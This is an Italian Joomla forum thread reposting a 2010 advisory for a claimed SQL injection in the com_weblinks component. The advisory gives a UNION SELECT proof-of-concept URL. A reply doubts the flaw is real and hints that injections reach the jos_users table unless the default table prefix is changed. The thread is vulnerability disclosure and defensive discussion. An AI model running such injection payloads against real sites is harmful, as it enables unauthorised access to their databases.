Autore Topic: Joomla Component Weblinks - com_weblinks SQL Injection (Letto 3315 volte)

jeckodevelopment · « **il:** 13 Lug 2010, 10:56:44 »

Non si hanno ancora maggiori informazioni su questa presunta vulnerabilità di tipo SQL Injection di com_weblinks

#################################################################
# Application Info:
# Name: Joomla Component com_weblinks
#################################################################
# Vulnerability Info:
# Type: Sql Injection
# Risk: Medium
#################################################################
Vulnerability:
http://site.com/index.php?option=com_weblinks&task=view&catid=8&id=-1 UNION
SELECT 1,2,3,4,5
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://Pouya.securitylab.ir
# Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com
###################################################################

mau_develop · « **Risposta #1 il:** 13 Lug 2010, 11:22:59 »

mi sono spulciato un po' il codice ma non vedo come possa funzionare, boh ..magari invecchio

... non capisco bene una cosa che nn ho tempo di guardare ora, ma forse c'è qualche possibilità se fosse l'admin ad esploitarsi.

cmq qualsiasi inj funziona se si verifica qs -> from%20jos_users

se avete dato un vostro prefisso siete abbastanza coperti, anche se solitamente resta comunque un "buco" libero alla fantasia

M.

Autore Topic: Joomla Component Weblinks - com_weblinks SQL Injection (Letto 3315 volte)

jeckodevelopment

Joomla Component Weblinks - com_weblinks SQL Injection

mau_develop

Re:Joomla Component Weblinks - com_weblinks SQL Injection